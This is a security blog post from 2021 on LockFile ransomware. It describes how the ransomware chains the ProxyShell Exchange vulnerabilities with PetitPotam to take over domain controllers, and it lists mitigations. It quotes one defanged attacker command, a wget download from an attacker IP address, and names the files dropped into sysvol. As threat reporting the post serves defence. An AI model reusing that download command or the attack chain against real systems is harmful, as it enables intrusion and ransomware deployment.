Table of Contents
  • Home
  • /
  • Blog
  • /
  • How Does The New LockFile Ransomware Compromise The Domain Controller? And, How You Should Protect?
August 23, 2021

How Does The New LockFile Ransomware Compromise The Domain Controller? And, How You Should Protect?

New Lockfile Ransomware

Researchers have observed new ransomware dubbed as LockFile ransomware targetting Unpatched Microsoft Exchange servers. Threat actors will gain access to the Victims network through Microsoft exchange servers by exploiting the three chained Microsoft Exchange vulnerabilities tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. After exploiting the Exchange server, threat actors use PetitPotam vulnerability to take over Windows domains and encrypt the compromised systems. Successful exploitation of these vulnerabilities results in unauthenticated Remote Code execution. Its important to know how does LockFile ransomware compromises the domain controller and how to protect exchange servers from the new LockFile ransomware.

Victims Of The New LockFile Ransomware

This new LockFile ransomware has compromised at least more than 10 businesses in the ongoing campaign. The campaign didnt keep a specific target at the time of writing this post. However, it seems to be targeting victims in various sectors around the globe: manufacturing, engineering, business services, legal, financial services, travel, and tourism sectors.

When Was The New LockFile Ransomware Seen?

LockFile ransomware is one of the newly found malware. It was first seen on July 20, 2021, on the network of a U.S. Its first action was recorded as recently as August 20. However, Comprehensive analysis is still underway. We will come to know more and more about ransomware as we progress in analysis. You can track the updates here.

The LockFile Ransom Note:

Like other ransomware, LockFile leaves a ransom note with standard instructions and contact information to the Victim.

Figure 1. The LockFile ransom note

How Does The New LockFile Ransomware Compromise The Victim?

In the previous sections, we have seen about the new LockFilw ransomware and its victims. In this section, we will see how does LockFile Ransomware Compromise the Victim.

  1. The initial attack vector is still unknown. However, researchers suspected that threat actors might have use proxyshell chain vulnerabilities tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 were used to compromise the exchange servers.

  2. Once the actor compromises the exchange, he runs wget commands on the PowerShell to download some unknown files from the IP address 209.14.0[.]234.  > wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH

  3. Typically, before 20 to 30 minutes of installing ransomware, the actor installs a set of tools efspotato.exe, an exploit for the CVE-2021-36942 vulnerability, active_desktop_render.dll, and active_desktop_launcher.exe on the compromised exchange server. 

  4. The actor use active_desktop_launcher.exe, a legitimate version of KuGou Active Desktop file to load the active_desktop_render.dll file. The active_desktop_render.dll then decrypt a file in the local directory called desktop.ini,’ which is a shellcodeFurther analysis is yet to be done to reveal more information about desktop.ini.

  5. Shellcode inside the desktop.ini file activates the efspotato.exe file, which has an exploit for the PetitPotam NTLM relay attack. 

  6. After the successful exploitation of the PetitPotam vulnerability on local domain controllers, The actor will copy the LockFile ransomware file with a batch file and supporting executables on the compromised domain controllers under the sysvol\domain\scripts’ directory. 

  7. Files inside the sysvol directory:

    1. Autologin.bat

    2. Autologin.exe

    3. Autologin.dll

    4. Autologin.sys

    5. Autoupdate.exe

  8. The LockFile ransomware will copy the batch scripts and other executables inside the sysvol\domain\scripts directory to the clients when they try authenticating with the domain controller.  

How You Should Protect Domain Controllers From The New LockFile Ransomware?

  1. It is recommended to keep the operating system updated to the current released patch level. Since LockFile ransomware targets the Victim using the Microsoft Exchange ProxyShell vulnerabilities and the Windows PetitPotam NTLM Relay vulnerability.

  2. Check for the presence of attack indicators in your network and deploy detection rules at the network and endpoint levels. Block IOCs as mentioned in this advisory.

  3. Keep Anti-malware solutions at the endpoint and network-level updated at all times.

  4. Deploy Endpoint Detection & Response (EDR) tools to detect the latest malware and suspicious activities on endpoints.

Indicators Of Compromise (IoC) Of The New LockFile Ransomware:

IP address:

File hashesDescription

Thanks for reading this threat post. Please make sure you are protected from the new LockFile ransomware and share this poet to protect others.

Read more such interesting articles on

Arun KL

Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.

Recently added

Application Security

View All

Learn More About Cyber Security Security & Technology

“Knowledge Arsenal: Empowering Your Security Journey through Continuous Learning”

Cybersecurity All-in-One For Dummies - 1st Edition

"Cybersecurity All-in-One For Dummies" offers a comprehensive guide to securing personal and business digital assets from cyber threats, with actionable insights from industry experts.



View All

Learn Something New with Free Email subscription